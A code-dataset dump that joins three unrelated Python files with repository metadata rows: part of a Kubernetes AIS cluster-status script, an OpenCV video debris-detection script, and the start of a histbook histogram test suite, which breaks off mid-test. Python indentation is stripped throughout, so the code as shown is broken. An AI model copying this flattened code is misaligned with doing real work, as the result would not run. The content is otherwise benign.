# 'pod': pod object from k8s list_pod_for_all_namespaces,
# 'aisClientApi': ais_client api for this daemon,
# 'smap': result of daemon smap query,
# 'config': result of daemon config query,
# 'stats': result of daemon stats query
# 'snode': result of daemon snode query
# }
#
self.daemons = {
'proxy': [{
'pod': pod
} for pod in proxy_pods],
'ne_proxy': [{
'pod': pod
} for pod in ne_proxy_pods],
'target': [{
'pod': pod
} for pod in target_pods]
}
#
# Lookup Proxy ClusterIP Service
# XXX Could/should add labels to services to shorten this
#
if not quiet:
print("Querying AIS k8s services ...")
svclist = self.v1api.list_service_for_all_namespaces(label_selector=self.proxySvcLabel).items
self.service = {}
self.service['proxyClusterIP'] = {}
for svc in svclist:
if svc.spec.type == 'ClusterIP' and svc.spec.cluster_ip != 'None':
self.service['proxyClusterIP']['ip'] = svc.spec.cluster_ip
self.service['proxyClusterIP']['port'] = svc.spec.ports[0].port
break
def refreshAisDaemonState(self, quiet=False):
"""Query AIS daemons for their state."""
def createAisApiClients(daemonlist):
""" Create openapi client API handles for a list of daemons (does not initiate connection yet). """
for d in daemonlist:
if d['pod'].status.pod_ip is None:
d['aisClientApi'] = None
continue
ais_config = ais_client.Configuration()
ais_config.debug = False
ais_config.host = "http://%s:%s/v1" % (d['pod'].status.pod_ip, d['pod'].spec.containers[0].ports[0].container_port)
d['aisClientApi'] = ais_client.ApiClient(ais_config)
createAisApiClients(self.daemons['proxy'])
createAisApiClients(self.daemons['ne_proxy'])
createAisApiClients(self.daemons['target'])
def aisDaemonQuery(daemonList):
"""Query the daemon api instance for smap, config, stats and snode info."""
def query(d, key, what):
"""Thread function to grab daemon info."""
d[key] = {}
try:
d[key] = ais_client.api.daemon_api.DaemonApi(d['aisClientApi']).get(what)
except (MaxRetryError, NewConnectionError):
pass
daemonQueries = ({
'key': 'smap', 'what': ais_client.openapi_models.GetWhat.SMAP
}, {
'key': 'config', 'what': ais_client.openapi_models.GetWhat.CONFIG
}, {
'key': 'stats', 'what': ais_client.openapi_models.GetWhat.STATS
}, {
'key': 'snode', 'what': ais_client.openapi_models.GetWhat.SNODE
})
#
# Make queries to all daemons in distinct threads per query - we don't want one
# wayward daemon to hold us up.
#
started = 0
for d in daemonList:
if d['aisClientApi'] is None:
d['smap'] = {}
d['config'] = {}
d['stats'] = {}
d['snode'] = {}
d['_threadlist'] = []
continue
d['_threadlist'] = [
threading.Thread(target=query, name='%s:%s' % (d['pod'].metadata.name, q['key']), args=(d, q['key'], q['what']))
for q in daemonQueries
]
for t in d['_threadlist']:
t.setDaemon(True)
t.start()
started += 1
#
# Join all threads on completion, limiting the time we'll wait
#
joined = 0
t1 = datetime.datetime.now()
while joined < started:
for d in daemonList:
for t in d['_threadlist']:
if not t.isAlive():
joined += 1
if (datetime.datetime.now() - t1).total_seconds() > 10:
break
if joined != started:
for d in daemonList:
stuck = []
for t in d['_threadlist']:
if t.isAlive():
stuck.append(t.getName())
if len(stuck) > 0:
print(" No response: %s" % ', '.join(stuck))
if not quiet:
print("Retrieving Smap/Config/Snode/Stats from each AIS daemon ...")
aisDaemonQuery(self.daemons['proxy'])
aisDaemonQuery(self.daemons['ne_proxy'])
aisDaemonQuery(self.daemons['target'])
def _aisNodeWalk(self, nodelist, cbfunc):
""" Iterate over proxy, ne-proxy or target nodes with given callback."""
for node in nodelist:
if cbfunc(node) != 0:
break
def aisProxyNodes(self):
"""Return list of nodes labeled for proxies."""
return self.nodes_proxy
def aisNeProxyNodes(self):
"""Return list of nodes labeled for ne proxies."""
return self.nodes_neproxy
def aisTargetNodes(self):
"""Return list of nodes labeled for targets."""
return self.nodes_target
def walkProxyNodes(self, cbfunc):
"""Walk proxy nodes with callback."""
self._aisNodeWalk(self.nodes_proxy, cbfunc)
def walkNeProxyNodes(self, cbfunc):
"""Walk ne-proxy nodes with callback."""
self._aisNodeWalk(self.nodes_neproxy, cbfunc)
def walkTargetNodes(self, cbfunc):
"""Walk target nodes with callback."""
self._aisNodeWalk(self.nodes_target, cbfunc)
def _aisPodWalk(self, daemonList, cbfunc):
""" Iterate over proxy, ne-proxy or target pods with given callback."""
for d in daemonList:
if (cbfunc(d['pod'], smap=d['smap'], config=d['config'], stats=d['stats'], snode=d['snode'])) != 0:
break
def aisProxyPods(self):
"""Return list of electable proxy pods."""
return [d.pod for d in self.daemons['proxy']]
def aisNeProxyPods(self):
"""Return list of non electable proxy pods."""
return [d.pod for d in self.daemons['ne_proxy']]
def aisTargetPods(self):
"""Return list of target pods."""
return [d.pod for d in self.daemons['target']]
def walkProxyPods(self, cbfunc):
"""Walk proxy pods with callback."""
self._aisPodWalk(self.daemons['proxy'], cbfunc)
def walkNeProxyPods(self, cbfunc):
"""Walk ne-proxy pods with callback."""
self._aisPodWalk(self.daemons['ne_proxy'], cbfunc)
def walkTargetPods(self, cbfunc):
"""Walk target pods with callback."""
self._aisPodWalk(self.daemons['target'], cbfunc)
def getInitialPrimaryNodeName(self):
"""Return node name labeled initial primary, or '-' if none."""
if self.initialPrimaryNodeName is not None:
return self.initialPrimaryNodeName
return '-'
def getProxyClusterSvc(self):
"""Return IP and port of clusterIP svc for proxies."""
ip = self.service["proxyClusterIP"].get('ip', '-')
port = self.service["proxyClusterIP"].get('port', '-')
return ip, port
if len(sys.argv) != 2:
raise Exception("require ais Helm release name as first argument")
aisk8s = Ais(sys.argv[1])
def print_ais_topo(aishdl):
nodename_ipp = aishdl.getInitialPrimaryNodeName()
smap_info = {'latest_version': 0, 'latest': None}
ready_counts = {'proxy': 0, 'ne_proxy': 0, 'target': 0}
print(
"Node labeling:\n\tProxy node(s): %d\n\tNon-electable proxy node(s): %d\n\tTarget node(s): %d" %
(len(aishdl.aisProxyNodes()), len(aishdl.aisNeProxyNodes()), len(aishdl.aisTargetNodes()))
)
print("\tNode labeled as initial primary proxy: %s\n" % nodename_ipp)
ip, port = aishdl.getProxyClusterSvc()
print("\tProxy ClusterIP service: %s:%s\n" % (ip, port))
cols = ({
'head': 'POD NAME', 'fmt': '%-25s'
}, {
'head': 'NODE', 'fmt': '%-11s'
}, {
'head': 'POD IP', 'fmt': '%-16s'
}, {
'head': 'RESTARTS', 'fmt': '%-9s'
}, {
'head': 'PODSTATE', 'fmt': '%-9s'
}, {
'head': 'LAST STATE CHANGE', 'fmt': '%-18s'
}, {
'head': 'READY', 'fmt': '%-5s'
}, {
'head': 'DAEMONID', 'fmt': '%-10s'
}, {
'head': 'SMAP', 'fmt': '%-4s'
})
podlinefmt = ' ' + ' '.join([col['fmt'] for col in cols])
podhdrline = podlinefmt % tuple([col['head'] for col in cols])
def print_pod_info(pod, **kwargs):
smap = kwargs['smap']
# args_config = kwargs['config']
# stats = kwargs['stats']
snode = kwargs['snode']
nodename = pod.spec.node_name
if nodename is None:
nodename = '(unscheduled)'
component = pod.metadata.labels.get(u'component', None)
if nodename == nodename_ipp and component == 'proxy':
nodename += "*"
else:
nodename += ' '
smap_version = smap.get(u'version', '-')
if smap_version != '-' and int(smap_version) > smap_info['latest_version']:
smap_info['latest_version'] = int(smap_version)
smap_info['latest'] = smap
now = datetime.datetime.now(pytz.utc)
podstate = '-'
since = '-'
try:
statemap = pod.status.container_statuses[0].state
for attr, attrname in statemap.attribute_map.items():
checkstate = getattr(statemap, attr, None)
if checkstate is not None:
podstate = attrname
for csattr in checkstate.attribute_map.keys():
details = getattr(checkstate, csattr, None)
if details is not None and checkstate.swagger_types[csattr] == 'datetime':
delta = now - details
since = 't-' + str(delta).split('.')[0]
break
else:
since = '?'
break
except TypeError: # if statemap is not yet filled (early startup)
pass
if pod.status.container_statuses is not None:
pod_restarts = pod.status.container_statuses[0].restart_count
if pod.status.container_statuses[0].ready:
pod_ready = "True"
if component in ready_counts:
ready_counts[component] += 1
else:
pod_ready = "False"
else:
pod_restarts = '-'
pod_ready = "False"
daemonid = snode.get('daemon_id', '-')
print(podlinefmt % (pod.metadata.name, nodename, pod.status.pod_ip, pod_restarts, podstate, since, pod_ready, daemonid, smap_version))
return 0
print(podhdrline)
aishdl.walkProxyPods(print_pod_info)
aishdl.walkNeProxyPods(print_pod_info)
aishdl.walkTargetPods(print_pod_info)
print("\nLatest observed smap version summary:")
# pylint: disable=unsubscriptable-object
latest = smap_info['latest']
if latest is not None:
print(" %-25s: %d" % ("Version", smap_info['latest_version']))
print(" %-25s: %s" % ("Current primary proxy", latest[u'proxy_si'][u'daemon_id']))
print(" %-25s: %d (%d ready)" % ("Electable proxies: ", len(latest[u'pmap']) - len(latest[u'non_electable']), ready_counts['proxy']))
print(" %-25s: %d (%d ready)" % ("Non-electable proxies: ", len(latest[u'non_electable']), ready_counts['ne_proxy']))
print(" %-25s: %d (%d ready)" % ("Targets: ", len(latest[u'tmap']), ready_counts['target']))
print_ais_topo(aisk8s)
sys.exit(0)
| 37.18578
| 142
| 0.571208
|
4a18a9ff30bbe15f8df1b39671448a4b1578a99e
| 1,064
|
py
|
Python
|
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import numpy as np
lowerBound=np.array([0,0,0])
upperBound=np.array([0,0,255])
cam= cv2.VideoCapture("debris.mp4")
kernelOpen=np.ones((5,5))
kernelClose=np.ones((20,20))
font=cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, img=cam.read()
img=cv2.resize(img,(1366,768))
#convert BGR to HSV
imgHSV= cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
# create the Mask
mask=cv2.inRange(imgHSV,lowerBound,upperBound)
#morphology
maskOpen=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernelOpen)
maskClose=cv2.morphologyEx(maskOpen,cv2.MORPH_CLOSE,kernelClose)
im,conts,h=cv2.findContours(maskClose.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
cv2.drawContours(img,conts,-1,(255,0,0),3)
for i in range(len(conts)):
x,y,w,h=cv2.boundingRect(conts[i])
cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255), 2)
cv2.putText(img, str(i+1),(x,y+h),font,1,(0,255,255))
cv2.imshow("camera",img)
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
| 29.555556
| 90
| 0.653195
|
4a18aad9be273f0a2951f6450206a330edb1b951
| 28,228
|
py
|
Python
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 67
|
2018-05-07T17:09:23.000Z
|
2018-06-22T00:30:06.000Z
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 31
|
2018-05-23T00:47:09.000Z
|
2018-06-22T16:45:57.000Z
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 7
|
2018-07-11T08:13:23.000Z
|
2021-08-29T05:20:42.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pickle
import unittest
import numpy
from histbook.axis import *
from histbook.hist import *
class TestHist(unittest.TestCase):
def runTest(self):
pass
def test_calc(self):
h = Hist(bin("x + 0.1", 10, 0, 1))
h.fill(x=[0.4, 0.3, 0.3, 0.5, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0]])
def test_defs(self):
h = Hist(bin("y", 10, 0, 1), defs={"y": "x + 0.1"})
h.fill(x=[0.4, 0.3, 0.3, 0.5, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0]])
def test_nofixed(self):
h = Hist(groupby("c"))
h.fill(c=["one", "two", "one", "one", "one"])
self.assertEqual(h._content["one"].tolist(), [4])
self.assertEqual(h._content["two"].tolist(), [1])
h = Hist(groupby("c"), profile("x"))
h.fill(c=["one", "two", "one", "one", "one"], x=[3, 2, 3, 5, 5])
self.assertEqual(h._content["one"].tolist(), [16, 68, 4])
self.assertEqual(h._content["two"].tolist(), [2, 4, 1])
h = Hist(profile("x"))
h.fill(x=[3, 3, 5, 5])
self.assertEqual(h._content.tolist(), [16, 68, 4])
h = Hist(weight="x")
h.fill(x=[3, 3, 5, 5])
self.assertEqual(h._content.tolist(), [16, 68])
h = Hist(profile("y"), weight="x")
h.fill(x=[2], y=[3])
self.assertEqual(h._content.tolist(), [6, 18, 2, 4])
h = Hist(bin("y", 1, -100, 100, underflow=False, overflow=False, nanflow=False), profile("y"), weight="x")
h.fill(x=[2], y=[3])
self.assertEqual(h._content.tolist(), [[6, 18, 2, 4]])
def test_bin(self):
h = Hist(bin("x", 10, 10, 11))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0], [0]])
h = Hist(bin("x", 10, 0, 1))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2], [3]])
h = Hist(bin("x", 10, 0, 1, underflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2], [3]])
h = Hist(bin("x", 10, 0, 1, overflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [3]])
h = Hist(bin("x", 10, 0, 1, nanflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2]])
h = Hist(bin("x", 10, 0, 1, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [2], [2], [1], [0], [0], [1], [0]])
h = Hist(bin("x", 2, 0, 2))
h.fill(x=[0.0, 0.0001, 0.0001, 0.5, 0.5, 0.5, 0.9999, 0.9999, 0.9999, 0.9999, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001])
self.assertEqual(h._content.tolist(), [[0], [1 + 2 + 3 + 4], [5 + 6 + 7 + 8], [9 + 10], [0]])
h = Hist(bin("x", 2, 0, 2, closedlow=False))
h.fill(x=[0.0, 0.0001, 0.0001, 0.5, 0.5, 0.5, 0.9999, 0.9999, 0.9999, 0.9999, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001])
self.assertEqual(h._content.tolist(), [[1], [2 + 3 + 4 + 5], [6 + 7 + 8 + 9], [10], [0]])
def test_bin_bin(self):
h = Hist(bin("x", 3, 0, 3, underflow=False, overflow=False, nanflow=False), bin("y", 5, 0, 5, underflow=False, overflow=False, nanflow=False))
h.fill(x=[1], y=[3])
self.assertEqual(h._content.tolist(), [[[0], [0], [0], [0], [0]], [[0], [0], [0], [1], [0]], [[0], [0], [0], [0], [0]]])
def test_bin_weight(self):
h = Hist(bin("x", 10, 10, 11), weight="y")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.2, 0.020000000000000004], [0.2, 0.020000000000000004], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11)).weight("y")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.2, 0.020000000000000004], [0.2, 0.020000000000000004], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
def test_bin_filter(self):
h = Hist(bin("x", 10, 10, 11), filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [1, 1], [1, 1], [0, 0], [0, 0], [1, 1], [0, 0], [0, 0], [0, 0]])
h = Hist(bin("x", 10, 10, 11)).filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [1, 1], [1, 1], [0, 0], [0, 0], [1, 1], [0, 0], [0, 0], [0, 0]])
def test_bin_weight_filter1(self):
h = Hist(bin("x", 10, 10, 11), weight=2, filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [2, 4], [2, 4], [0, 0], [0, 0], [2, 4], [0, 0], [0, 0], [0, 0]])
h = Hist(bin("x", 10, 10, 11)).weight(2).filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [2, 4], [2, 4], [0, 0], [0, 0], [2, 4], [0, 0], [0, 0], [0, 0]])
def test_bin_weight_filter2(self):
h = Hist(bin("x", 10, 10, 11), weight="y", filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-0.1, -0.1, -0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.1, 0.010000000000000002], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11)).weight("y").filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-0.1, -0.1, -0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.1, 0.010000000000000002], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
def test_bin_big(self):
numpy.random.seed(12345)
xdata = numpy.round(numpy.random.normal(0, 1, 10000), 2)
weights = numpy.random.uniform(-2, 2, 10000)
both = numpy.random.randint(0, 9999, 10)
xdata[numpy.random.randint(0, 9999, 10)] = numpy.nan
weights[numpy.random.randint(0, 9999, 10)] = numpy.nan
xdata[both] = numpy.nan
weights[both] = numpy.nan
nn = ~numpy.isnan(xdata)
nnweights = weights.copy()
nnweights[numpy.isnan(weights)] = 0.0
nnweights2 = nnweights**2
with numpy.errstate(invalid="ignore"):
under = numpy.count_nonzero(xdata < 0.0)
bin0 = numpy.count_nonzero(numpy.logical_and(0.0 <= xdata, xdata < 0.1))
bin1 = numpy.count_nonzero(numpy.logical_and(0.1 <= xdata, xdata < 0.2))
bin2 = numpy.count_nonzero(numpy.logical_and(0.2 <= xdata, xdata < 0.3))
bin3 = numpy.count_nonzero(numpy.logical_and(0.3 <= xdata, xdata < 0.4))
bin4 = numpy.count_nonzero(numpy.logical_and(0.4 <= xdata, xdata < 0.5))
bin5 = numpy.count_nonzero(numpy.logical_and(0.5 <= xdata, xdata < 0.6))
bin6 = numpy.count_nonzero(numpy.logical_and(0.6 <= xdata, xdata < 0.7))
bin7 = numpy.count_nonzero(numpy.logical_and(0.7 <= xdata, xdata < 0.8))
bin8 = numpy.count_nonzero(numpy.logical_and(0.8 <= xdata, xdata < 0.9))
bin9 = numpy.count_nonzero(numpy.logical_and(0.9 <= xdata, xdata < 1.0))
over = numpy.count_nonzero(xdata >= 1.0)
nan = numpy.count_nonzero(numpy.isnan(xdata))
wunder = numpy.sum(nnweights * numpy.logical_and(nn, xdata < 0.0))
wbin0 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.0 <= xdata, xdata < 0.1)))
wbin1 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.1 <= xdata, xdata < 0.2)))
wbin2 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.2 <= xdata, xdata < 0.3)))
wbin3 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.3 <= xdata, xdata < 0.4)))
wbin4 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.4 <= xdata, xdata < 0.5)))
wbin5 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.5 <= xdata, xdata < 0.6)))
wbin6 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.6 <= xdata, xdata < 0.7)))
wbin7 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.7 <= xdata, xdata < 0.8)))
wbin8 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.8 <= xdata, xdata < 0.9)))
wbin9 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.9 <= xdata, xdata < 1.0)))
wover = numpy.sum(nnweights * numpy.logical_and(nn, (xdata >= 1.0)))
wnan = numpy.sum(nnweights * numpy.isnan(xdata))
w2under = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata < 0.0)))
w2bin0 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.0 <= xdata, xdata < 0.1)))
w2bin1 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.1 <= xdata, xdata < 0.2)))
w2bin2 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.2 <= xdata, xdata < 0.3)))
w2bin3 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.3 <= xdata, xdata < 0.4)))
w2bin4 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.4 <= xdata, xdata < 0.5)))
w2bin5 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.5 <= xdata, xdata < 0.6)))
w2bin6 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.6 <= xdata, xdata < 0.7)))
w2bin7 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.7 <= xdata, xdata < 0.8)))
w2bin8 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.8 <= xdata, xdata < 0.9)))
w2bin9 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.9 <= xdata, xdata < 1.0)))
w2over = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata >= 1.0)))
w2nan = numpy.sum(nnweights2 * numpy.isnan(xdata))
for underflow in False, True:
for overflow in False, True:
for nanflow in False, True:
compare = [bin0, bin1, bin2, bin3, bin4, bin5, bin6, bin7, bin8, bin9]
if underflow:
compare.insert(0, under)
if overflow:
compare.append(over)
if nanflow:
compare.append(nan)
# h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow))
# h.fill(x=xdata)
# self.assertEqual(h._content.reshape(-1).tolist(), compare)
compare = [[wbin0, w2bin0], [wbin1, w2bin1], [wbin2, w2bin2], [wbin3, w2bin3], [wbin4, w2bin4], [wbin5, w2bin5], [wbin6, w2bin6], [wbin7, w2bin7], [wbin8, w2bin8], [wbin9, w2bin9]]
if underflow:
compare.insert(0, [wunder, w2under])
if overflow:
compare.append([wover, w2over])
if nanflow:
compare.append([wnan, w2nan])
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow)).weight("w")
h.fill(x=xdata, w=weights)
self.assertTrue(numpy.absolute((h._content - numpy.array(compare)).reshape(-1)).max() < 1e-10)
with numpy.errstate(invalid="ignore"):
under = numpy.count_nonzero(xdata <= 0.0)
bin0 = numpy.count_nonzero(numpy.logical_and(0.0 < xdata, xdata <= 0.1))
bin1 = numpy.count_nonzero(numpy.logical_and(0.1 < xdata, xdata <= 0.2))
bin2 = numpy.count_nonzero(numpy.logical_and(0.2 < xdata, xdata <= 0.3))
bin3 = numpy.count_nonzero(numpy.logical_and(0.3 < xdata, xdata <= 0.4))
bin4 = numpy.count_nonzero(numpy.logical_and(0.4 < xdata, xdata <= 0.5))
bin5 = numpy.count_nonzero(numpy.logical_and(0.5 < xdata, xdata <= 0.6))
bin6 = numpy.count_nonzero(numpy.logical_and(0.6 < xdata, xdata <= 0.7))
bin7 = numpy.count_nonzero(numpy.logical_and(0.7 < xdata, xdata <= 0.8))
bin8 = numpy.count_nonzero(numpy.logical_and(0.8 < xdata, xdata <= 0.9))
bin9 = numpy.count_nonzero(numpy.logical_and(0.9 < xdata, xdata <= 1.0))
over = numpy.count_nonzero(xdata > 1.0)
nan = numpy.count_nonzero(numpy.isnan(xdata))
wunder = numpy.sum(nnweights * numpy.logical_and(nn, xdata <= 0.0))
wbin0 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.0 < xdata, xdata <= 0.1)))
wbin1 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.1 < xdata, xdata <= 0.2)))
wbin2 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.2 < xdata, xdata <= 0.3)))
wbin3 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.3 < xdata, xdata <= 0.4)))
wbin4 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.4 < xdata, xdata <= 0.5)))
wbin5 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.5 < xdata, xdata <= 0.6)))
wbin6 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.6 < xdata, xdata <= 0.7)))
wbin7 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.7 < xdata, xdata <= 0.8)))
wbin8 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.8 < xdata, xdata <= 0.9)))
